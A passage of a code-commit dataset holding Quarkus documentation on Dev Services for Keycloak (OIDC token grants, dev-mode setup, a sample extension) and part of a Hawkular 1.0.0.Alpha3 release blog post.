have been detected.\n\nAdditionally, link:dev-ui[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] supports this feature with a Keycloak specific page which helps to acquire the tokens from Keycloak and test your Quarkus application.\n\n== Dev Services for Keycloak\n\nStart your application without configuring `quarkus.oidc` properties in `application.properties`. You will see in the console something similar to:\n\n[source,shell]\n----\n$ mvn quarkus:dev\n\n2021-06-04 16:22:47,175 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Creating container for image: quay.io\/keycloak\/keycloak:14.0.0\n2021-06-04 16:22:47,243 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Starting container with ID: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,629 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 is starting: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,643 INFO [org.tes.con.wai.str.HttpWaitStrategy] (build-38) \/elastic_lovelace: Waiting for 60 seconds for URL: http:\/\/localhost:32812\/auth (where port 32812 maps to container port 8080)\n2021-06-04 16:23:07,665 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 started in PT5.500489S\n...\n2021-06-04 16:23:11,155 INFO [io.quarkus] (Quarkus Main Thread) security-openid-connect-quickstart 1.0.0-SNAPSHOT on JVM (powered by Quarkus 999-SNAPSHOT) started in 25.968s. Listening on: http:\/\/localhost:8080\n2021-06-04 16:23:11,157 INFO [io.quarkus] (Quarkus Main Thread) Profile dev activated. Live Coding activated.\n----\n\nThe `quay.io\/keycloak\/keycloak:14.0.0` Keycloak image is used by default to start a container. `quarkus.keycloak.devservices.image-name` can be used to change the Keycloak image used.\n\nNow open the main Dev UI page and you will see the `OpenId Connect Card` linking to a `Keycloak` page:\n\nimage::dev-ui-oidc-keycloak-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\nClick on the `Provider: Keycloak` link and you will see a Keycloak page which will be presented slightly differently depending on how `Dev Services for Keycloak` feature has been configured.\n\n=== Testing Service Applications\n\nBy default the Keycloak page can be used to support the development of a link:security-openid-connect[Quarkus OIDC service application].\n\n==== Implicit Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=implicit` in `applicatin.properties` (this is a default value) then an `implicit` grant will be used to acquire both access and ID tokens.\nUsing this grant is recommended to emulate a typical flow where a `Singe Page Application` acquires the tokens and uses them to access Quarkus services.\n\nFirst you will see an option to `Log into Single Page Application`:\n\nimage::dev-ui-keycloak-sign-in-to-spa.png[alt=Dev UI OpenId Connect Keycloak Page - Log into Single Page Application,role=\"center\"].\n\nNext, after you select this option, you will be redirected to Keycloak to authenticate, example, as `alice:alice` and then returned to the page representing the SPA: \n\nimage::dev-ui-keycloak-test-service-from-spa.png[alt=Dev UI OpenId Connect Keycloak Single Page Application,role=\"center\"].\n\nHere you can test the service with either the access token or ID token (note that the ID token will be sent as a regular bearer token).\n\nFinally you can click a `Logged in` option if you'd like to log out and authenticate to Keycloak as a different user.\n\n==== Password Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=password` in `applicatin.properties` then you will see a screen like this one:\n\nimage::dev-ui-keycloak-password-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Password Grant,role=\"center\"]\n\nEnter a registered user name, a relative service endpoint path, click on `Test Service` and you will see a status code such as `200`, `403`, `401` or `404` printed.\n\nYou will also see in the Dev UI console something similar to:\n\n[source,shell]\n----\n2021-07-19 17:58:11,407 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Getting token from 'http:\/\/localhost:32818\/auth\/realms\/quarkus\/protocol\/openid-connect\/token' for user 'alice' in realm 'quarkus' using client id 'quarkus-app'\n2021-07-19 17:58:11,533 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Test token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ6Z2tDazJQZ1JaYnVlVG5kcTFKSW1sVnNoZ2hhbWhtbnBNcXU0QUt5MnJBIn0.ey...\n2021-07-19 17:58:11,536 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Sending token to 'http:\/\/localhost:8080\/api\/admin'\n2021-07-19 17:58:11,674 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Result: 200\n----\n\nA token is acquired from Keycloak using a `password` grant and is sent to the service endpoint.\n\n==== Client Credentials Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=client` then a `client_credentials` grant will be used to acquire a token, with the page showing no `User` field in this case:\n\nimage::dev-ui-keycloak-client-credentials-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Client Credentials Grant,role=\"center\"].\n\nYou can test the service the same way as with the `Password` grant.\n\n=== Developing OpenId Connect Web App Applications\n\nIf you develop a link:security-openid-connect-web-authentication[Quarkus OIDC web-app application] then you should set `quarkus.oidc.application-type=web-app` in `application.properties` before starting the application.\n\nYou will see a screen like this one:\n\nimage::dev-ui-keycloak-sign-in-to-service.png[alt=Dev UI OpenId Connect Keycloak Sign In,role=\"center\"]\n\nSet a relative service endpoint path, click on `Sign In To Service` and you will be redirected to Keycloak to enter a username and password in a new browser tab and get a response from the Quarkus application.\n\n=== Keycloak Initialization\n\nYou do not need to configure `quarkus-oidc-keycloak` to start developing your Quarkus Keycloak `OIDC` applications with the only exception being that `quarkus.oidc.application-type=web-app` has to be set in `application.properties` to give the `Keycloak` page a hint it needs to show an option to `Sign In To Service`.\n\nBy default, the `quarkus`, `quarkus-app` client with a `secret` password, `alice` and `bob` users (with the passwords matching the names), and `user` and `admin` roles are created, with `alice` given both `admin` and `user` roles and `bob` - the `user` role. \n\nUsernames, secrets and their roles can be customized with `quarkus.keycloak.devservices.users` (the map which contains usernames and secrets) and `quarkus.keycloak.devservices.roles` (the map which contains user names and comma separated role values).\n\n`quarkus.oidc.client-id` and `quarkus.oidc.credentials.secret` can be used to customize the client id and secret.\n\nHowever it is likely your Keycloak configuration may be more complex and require setting more properties.\n\nThis is why `quarkus.keycloak.devservices.realm-path` is always checked first before trying to initialize Keycloak with the default or configured realm, client, user and roles properties. If the realm file exists on the file system or classpath then only this realm will be used to initialize Keycloak.\n\nAlso the Keycloak page offers an option to `Sign In To Keycloak To Configure Realms` using a `Keycloak Admin` option in the right top corner:\n\nimage::dev-ui-keycloak-admin.png[alt=Dev UI OpenId Connect Keycloak Page - Keycloak Admin,role=\"center\"].\n\nSign in to Keycloak as `admin:admin` in order to further customize the realm properties or create a new realm, export the realm and have Keycloak initialized with the custom realm after a restart.\n\nNote that even if you initialize Keycloak from a realm file, it is still needed to set the `quarkus.keycloak.devservices.realm-name` property for `quarkus.oidc.auth-server-url` to be calculated correctly. Setting the `quarkus.keycloak.devservices.users` property is needed if a `password` grant is used to acquire the tokens to test the OIDC `service` applications.\n\n== Disable DevServices for Keycloak\n\n`DevServices For Keycloak` will not be activated if either `quarkus.oidc.auth-server-url` is already initialized or the defaut OIDC tenant is disabled with `quarkus.oidc.tenant.enabled=false`, irrespectively of whether you work with Keycloak or not.\n\nIf you prefer not to have a `DevServices for Keycloak` container started or do not work with Keycloak then you can also disable this feature with `quarkus.keycloak.devservices.enabled=false` - it will only be necessary if you expect to start `quarkus:dev` without `quarkus.oidc.auth-server-url`.\n\nThe main Dev UI page will include an empty `OpenId Connect Card` when `DevServices for Keycloak` is disabled:\n\nimage::dev-ui-oidc-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\n== Dev Services Support for other OpenId Connect Providers\n\nYour custom extension would need to extend `quarkus-oidc` only and add the dependencies required to support your provider to the extension's `deployment` module only.\n\nThe build step dealing with the `DevServices` should additionally register two runtime properties into the \"io.quarkus.quarkus-oidc\" namespace: `oidcProviderName` (for example, `Google`) and `oidcProviderUrlBase` (for example: `mycompany.devservices-google`) for the `OpenId Connect Card` to link to the Dev UI page representing your provider, for example:\n\n[source,shell]\n----\npackage io.quarkus.oidc.okta.runtime;\n\nimport java.util.function.Supplier;\n\nimport io.quarkus.runtime.annotations.Recorder;\n\n\/\/ This simple recorder is the only code which will be located in the extension's `runtime` module\n@Recorder\npublic class OktaDevServicesRecorder {\n\n public Supplier<String> getProviderName() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"OKTA\";\n }\n };\n }\n\n public Supplier<String> getProviderUrlBase() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"io.quarkus\" + \".\" + \"quarkus-oidc-okta\";\n }\n };\n }\n}\n\n\npackage io.quarkus.oidc.okta.deployment.devservices;\n\nimport static io.quarkus.deployment.annotations.ExecutionTime.RUNTIME_INIT;\n\nimport java.util.Optional;\n\nimport io.quarkus.deployment.IsDevelopment;\nimport io.quarkus.deployment.annotations.BuildProducer;\nimport io.quarkus.deployment.annotations.BuildStep;\nimport io.quarkus.deployment.annotations.Consume;\nimport io.quarkus.deployment.annotations.Record;\nimport io.quarkus.deployment.builditem.RuntimeConfigSetupCompleteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRouteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRuntimeTemplateInfoBuildItem;\n\npublic class OktaDevConsoleProcessor {\n\n @BuildStep(onlyIf = IsDevelopment.class)\n @Record(value = RUNTIME_INIT)\n public void setOidcProviderProperties(BuildProducer<DevConsoleRuntimeTemplateInfoBuildItem> provider,\n OktaDevServicesRecorder recorder,\n Optional<DevServicesConfigBuildItem> configProps) {\n if (configProps.isPresent()) {\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderName\",\n recorder.getProviderName()));\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderUrlBase\",\n recorder.getProviderUrlBase()));\n }\n }\n}\n\n----\n\nAdditionally, the extension should produce a `io.quarkus.oidc.deployment.devservices.OidcProviderBuildItem` to disable the default `DevServices for Keycloak`, instead of the users having to type `quarkus.keycloak.devservices.enabled=false`.\n\nPlease follow the link:dev-ui[Dev UI] tutorial as well as check the `extensions\/oidc\/deployment` sources for more ideas.\n\n== References\n\n* link:dev-ui[Dev UI]\n* https:\/\/www.keycloak.org\/documentation.html[Keycloak Documentation]\n* https:\/\/openid.net\/connect\/[OpenID Connect]\n* link:security-openid-connect[Quarkus - Using OpenID Connect to Protect Service Applications using Bearer Token Authorization]\n* link:security-openid-connect-web-authentication[Quarkus - Using OpenID Connect to Protect Web Applications using Authorization Code Flow]\n* link:security[Quarkus Security]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Dev Services for OpenId Connecta\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers the Dev Services for OpenId Connect Keycloak provider and explains how to support other OpenId Connect providers.\n\n== Introduction\n\nQuarkus introduces an experimental `DevServices For Keycloak` feature which is enabled by default when the `quarkus-oidc` extension is loaded in a dev mode with `mvn quarkus:dev`. It starts a Keycloak container and initializes it by registering the existing Keycloak realm or creating a new realm with the client and users for you to start developing your Quarkus application secured by Keycloak immediately. It will restart a container when the `application.properties` or the realm file changes have been detected.\n\nAdditionally, link:dev-ui[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] supports this feature with a Keycloak specific page which helps to acquire the tokens from Keycloak and test your Quarkus application.\n\n== DevServices for Keycloak\n\nStart your application without configuring `quarkus.oidc` properties in `application.properties`. You will see in the console something similar to:\n\n[source,shell]\n----\n$ mvn quarkus:dev\n\n2021-06-04 16:22:47,175 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Creating container for image: quay.io\/keycloak\/keycloak:14.0.0\n2021-06-04 16:22:47,243 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Starting container with ID: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,629 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 is starting: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,643 INFO [org.tes.con.wai.str.HttpWaitStrategy] (build-38) \/elastic_lovelace: Waiting for 60 seconds for URL: http:\/\/localhost:32812\/auth (where port 32812 maps to container port 8080)\n2021-06-04 16:23:07,665 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 started in PT5.500489S\n...\n2021-06-04 16:23:11,155 INFO [io.quarkus] (Quarkus Main Thread) security-openid-connect-quickstart 1.0.0-SNAPSHOT on JVM (powered by Quarkus 999-SNAPSHOT) started in 25.968s. Listening on: http:\/\/localhost:8080\n2021-06-04 16:23:11,157 INFO [io.quarkus] (Quarkus Main Thread) Profile dev activated. Live Coding activated.\n----\n\nThe `quay.io\/keycloak\/keycloak:14.0.0` Keycloak image is used by default to start a container. `quarkus.keycloak.devservices.image-name` can be used to change a Keycloak image name.\n\nNow open the main Dev UI page and you will see the `OpenId Connect Card` linking to a `Keycloak` page:\n\nimage::dev-ui-oidc-keycloak-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\nClick on the `Provider: Keycloak` link and you will see a Keycloak page which will be presented slightly differently depending on how `DevServices for Keycloak` feature has been configured.\n\n=== Testing Service Applications\n\nBy default the Keycloak page can be used to support the development of a link:security-openid-connect[Quarkus OIDC service application].\n\n==== Implicit Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=implicit` in `applicatin.properties` (this is a default value) then an `implicit` grant will be used to acquite both access and ID tokens.\nUsing this grant is recommended to emulate a typical flow where a `Singe Page Application` acquires the tokens and uses them to access Quarkus services.\n\nFirst you will see an option to `Log into Single Page Application`:\n\nimage::dev-ui-keycloak-sign-in-to-spa.png[alt=Dev UI OpenId Connect Keycloak Page - Log into Single Page Application,role=\"center\"].\n\nNext, after you select this option, you will be redirected to Keycloak to authenticate, example, as `alice:alice` and then returned to the page representing the SPA: \n\nimage::dev-ui-keycloak-test-service-from-spa.png[alt=Dev UI OpenId Connect Keycloak Single Page Application,role=\"center\"].\n\nHere you can test the service with either the access token or ID token (note ID token will be sent as a regular bearer token).\n\nFinally you can click a `Logged in` option if you'd like to log out and authenticate to Keycloak as a different user.\n\n==== Password Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=password` in `applicatin.properties` then you will see a screen like this one:\n\nimage::dev-ui-keycloak-password-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Password Grant,role=\"center\"]\n\nEnter a registered user name, a relative service endpoint path, click on `Test Service` and you will see a status code such as `200`, `403`, `401` or `404` printed.\n\nYou will also see in the Dev UI console something similar to:\n\n[source,shell]\n----\n2021-07-19 17:58:11,407 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Getting token from 'http:\/\/localhost:32818\/auth\/realms\/quarkus\/protocol\/openid-connect\/token' for user 'alice' in realm 'quarkus' using client id 'quarkus-app'\n2021-07-19 17:58:11,533 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Test token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ6Z2tDazJQZ1JaYnVlVG5kcTFKSW1sVnNoZ2hhbWhtbnBNcXU0QUt5MnJBIn0.ey...\n2021-07-19 17:58:11,536 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Sending token to 'http:\/\/localhost:8080\/api\/admin'\n2021-07-19 17:58:11,674 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Result: 200\n----\n\nA token is acquired from Keycloak using a `password` grant and is sent to the service endpoint.\n\n==== Client Credentials Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=client` then a `client_credentials` grant will be used to acquite a token, with the page showing no `User` field in this case:\n\nimage::dev-ui-keycloak-client-credentials-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Client Credentials Grant,role=\"center\"].\n\nYou can test the service the same way as with the `Password` grant.\n\n=== Developing OpenId Connect Web App Applications\n\nIf you develop a link:security-openid-connect-web-authentication[Quarkus OIDC web-app application] then you should set `quarkus.oidc.application-type=web-app` in `application.properties` before starting an application.\n\nYou will see a screen like this one:\n\nimage::dev-ui-keycloak-sign-in-to-service.png[alt=Dev UI OpenId Connect Keycloak Sign In,role=\"center\"]\n\nSet a relative service endpoint path, click on `Sign In To Service` and you will be redirected to Keycloak to enter a user name and password in a new browser tab and get a response from a Quarkus application.\n\n=== Keycloak Initialization\n\nYou do not need to configure `quarkus-oidc-keycloak` to start developing your Quarkus Keycloak `OIDC` applications with the only exception is that `quarkus.oidc.application-type=web-app` has to be set in `application.properties` to give the `Keycloak` page a hint it needs to show an option to `Sign In To Service`.\n\nBy default, the `quarkus`, `quarkus-app` client with a `secret` password, `alice` and `bob` users (with the passwords matching the names), and `user` and `admin` roles are created, with `alice` given both `admin` and `user` roles and `bob` - the `user` role. \n\nUser names, secrets and their roles can be customized with `quarkus.keycloak.devservices.users` (the map which contains user names and secrets) and `quarkus.keycloak.devservices.roles` (the map which contains user names and comma separated role vales).\n\n`quarkus.oidc.client-id` and `quarkus.oidc.credentials.secret` can be used to customize the client id and secret.\n\nHowever it is likely your Keycloak configuration may be more complex and require setting more properties.\n\nThis is why `quarkus.keycloak.devservices.realm-path` is always checked first before trying to initialize Keycloak with the default or configured realm, client, user and roles properties. If the realm file exists on a file system or class path then only this realm will be used to initialize Keycloak.\n\nAlso the Keycloak page offers an option to `Sign In To Keycloak To Configure Realms` using a `Keycloak Admin` option in the right top corner:\n\nimage::dev-ui-keycloak-admin.png[alt=Dev UI OpenId Connect Keycloak Page - Keycloak Admin,role=\"center\"].\n\nSign in to Keycloak as `admin:admin` in order to further customize the realm properties or create a new realm, export the realm and have Keycloak initialized with the custom realm after a restart.\n\nNote that even if you initialize Keycloak from a realm file, it is still needed to set `quarkus.keycloak.devservices.realm-name` property for `quarkus.oidc.auth-server-url` be calculated correctly. Setting `quarkus.keycloak.devservices.users` property is needed if a `password` grant is used to acquire the tokens to test the OIDC `service` applications.\n\n== Disable DevServices for Keycloak\n\n`DevServices For Keycloak` will not be activated if either `quarkus.oidc.auth-server-url` is already initialized or the defaut OIDC tenant is disabled with `quarkus.oidc.tenant.enabled=false`, irrespectively of whether you work with Keycloak or not.\n\nIf you prefer not to have a `DevServices for Keycloak` container starting or do not work with Keycloak then you can also disable this feature with `quarkus.keycloak.devservices.enabled=false` - it will only be necessary if you expect to start `quarkus:dev` without `quarkus.oidc.auth-server-url`.\n\nThe main Dev UI page will include an empty `OpenId Connect Card` when `DevServices for Keycloak` is disabled:\n\nimage::dev-ui-oidc-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\n== Dev Services Support for other OpenId Connect Providers\n\nYour custom extension would need to extend `quarkus-oidc` only and add the dependencies required to support your provider to the extension's `deployment` module only.\n\nThe build step dealing with the `DevServices` should additionally register two runtime properties into the \"io.quarkus.quarkus-oidc\" namespace: `oidcProviderName` (for example, `Google`) and `oidcProviderUrlBase` (for example: `mycompany.devservices-google`) for the `OpenId Connect Card` to link to the Dev UI page representing your provider, for example:\n\n[source,shell]\n----\npackage io.quarkus.oidc.okta.runtime;\n\nimport java.util.function.Supplier;\n\nimport io.quarkus.runtime.annotations.Recorder;\n\n\/\/ This simple recorder is the only code which will be located in the extension's `runtime` module\n@Recorder\npublic class OktaDevServicesRecorder {\n\n public Supplier<String> getProviderName() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"OKTA\";\n }\n };\n }\n\n public Supplier<String> getProviderUrlBase() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"io.quarkus\" + \".\" + \"quarkus-oidc-okta\";\n }\n };\n }\n}\n\n\npackage io.quarkus.oidc.okta.deployment.devservices;\n\nimport static io.quarkus.deployment.annotations.ExecutionTime.RUNTIME_INIT;\n\nimport java.util.Optional;\n\nimport io.quarkus.deployment.IsDevelopment;\nimport io.quarkus.deployment.annotations.BuildProducer;\nimport io.quarkus.deployment.annotations.BuildStep;\nimport io.quarkus.deployment.annotations.Consume;\nimport io.quarkus.deployment.annotations.Record;\nimport io.quarkus.deployment.builditem.RuntimeConfigSetupCompleteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRouteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRuntimeTemplateInfoBuildItem;\n\npublic class OktaDevConsoleProcessor {\n\n @BuildStep(onlyIf = IsDevelopment.class)\n @Record(value = RUNTIME_INIT)\n public void setOidcProviderProperties(BuildProducer<DevConsoleRuntimeTemplateInfoBuildItem> provider,\n OktaDevServicesRecorder recorder,\n Optional<DevServicesConfigBuildItem> configProps) {\n if (configProps.isPresent()) {\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderName\",\n recorder.getProviderName()));\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderUrlBase\",\n recorder.getProviderUrlBase()));\n }\n }\n}\n\n----\n\nAdditionally, the extension should produce `quarkus.oidc.deployment.devservices.OidcProviderBuildItem` to disable the default `DevServices for Keycloak`, instead of the users having to type `quarkus.keycloak.devservices.enabled=false`.\n\nPlease follow the link:dev-ui[Dev UI] tutorial as well as check the `quarkus-oidc\/deployment` source for more ideas.\n\n== References\n\n* link:dev-ui[Dev UI]\n* https:\/\/www.keycloak.org\/documentation.html[Keycloak Documentation]\n* https:\/\/openid.net\/connect\/[OpenID Connect]\n* link:security-openid-connect[Quarkus - Using OpenID Connect to Protect Service Applications using Bearer Token Authorization]\n* link:security-openid-connect-web-authentication[Quarkus - Using OpenID Connect to Protect Web Applications using Authorization Code Flow]\n* link:security[Quarkus Security]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3998bd46fd12bb3678ea1ecb056c31e65d2a664b","subject":"Substitute link to G+ demo hangout with YT-Link","message":"Substitute link to G+ demo hangout with YT-Link\n","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/30\/hawkular-1.0.0.Alpha3-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/30\/hawkular-1.0.0.Alpha3-released.adoc","new_contents":"= Hawkular, all good things make three!\nHeiko Rupp\n2015-07-30\n:jbake-type: post\n:jbake-status: published\n:jbake-tags: blog, hawkular, release\n\nWe are very happy to release the third version of Hawkular!\nAs with the previous one, this was the most important release of Hawkular so far.\n\n== App server support\n\nThe main focus of this release clearly was the extended monitoring of http:\/\/www.wildfly.org\/[WildFly] application\nservers.\n\n\nNOTE: For the moment you will need to instrument your server manually following\nhttp:\/\/www.hawkular.org\/docs\/user\/getting-started.html#_install_a_wildfly_monitoring_agent[these instructions].\nWe will make this easier in the future.\n\nDeployments in the monitored server can now be enabled\/disabled and redeployed. Deployment of new content\nwill come in the next release.\n\n[[img-server-deploy-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\n\nWe also have a new _web_-tab that gives statistics about the web subsystem of the managed WildFly\n\n[[img-webtab]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\n\n== More details for URLs\n\nHawkular now also collects the current IP address and the server information for the URLs being monitored\n\n[[img-url-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png[URL details,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_url_traits.png\"]\nendif::[]\n\n\n== Notable changes in this release were:\n\n\n* Implement more app server details as mentioned above\n* Upgrade underlying versions of Hawkular-Metrics and other subsystems\n* More alerting capabilities\n\nHead over to the link:\/releasenotes\/1.0.0.Alpha3.html[Full release notes] for more details.\n\n\n== Demo\n\nWe have again run a demonstration of the new Hawkular features:\n\nvideo::otLyoXYlV-s[youtube,width=600,height=400]\n\nWe plan to do a lot more Alpha releases with even more features, the next Alpha is planned for August 26th, and\nlink:\/docs\/dev\/development.html[you can help us] :)\n\nThank you for the contributions!\n\n== Downloads\n\nYou can download the release here:\n\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.zip[Hawkular 1.0.0.Alpha3 (zip)]\n* http:\/\/download.jboss.org\/hawkular\/hawkular\/1.0.0.Alpha3\/hawkular-dist-1.0.0.Alpha3.tar.gz[Hawkular 1.0.0.Alpha3\n(tar.gz)]\n\n== What's next?\n\nDuring the weeks until the next release and demo we want to address the following:\n\n* More details of the application servers\n* Uploading of new applications into managed servers\n* More alerting related changes\n* An easiert to grasp resource naming schema\n* Hopefully definition of jdbc drivers and data sources\n","old_contents":"= Hawkular, all good things make three!\nHeiko Rupp\n2015-07-30\n:jbake-type: post\n:jbake-status: published\n:jbake-tags: blog, hawkular, release\n\nWe are very happy to release the third version of Hawkular!\nAs with the previous one, this was the most important release of Hawkular so far.\n\n== App server support\n\nThe main focus of this release clearly was the extended monitoring of http:\/\/www.wildfly.org\/[WildFly] application\nservers.\n\n\nNOTE: For the moment you will need to instrument your server manually following\nhttp:\/\/www.hawkular.org\/docs\/user\/getting-started.html#_install_a_wildfly_monitoring_agent[these instructions].\nWe will make this easier in the future.\n\nDeployments in the monitored server can now be enabled\/disabled and redeployed. Deployment of new content\nwill come in the next release.\n\n[[img-server-deploy-detail]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png[Hawkular server deployments,200,align=\"center\",link=\"..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_deploy_actions.png\"]\nendif::[]\n\nWe also have a new _web_-tab that gives statistics about the web subsystem of the managed WildFly\n\n[[img-webtab]]\nifndef::env-github[]\nimage::\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web stats,500,align=\"center\",link=\"\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png\"]\nendif::[]\nifdef::env-github[]\nimage::..\/..\/..\/..\/..\/assets\/img\/blog\/2015\/1.0.0.Alpha3_web_tab.png[Wildfly servers web 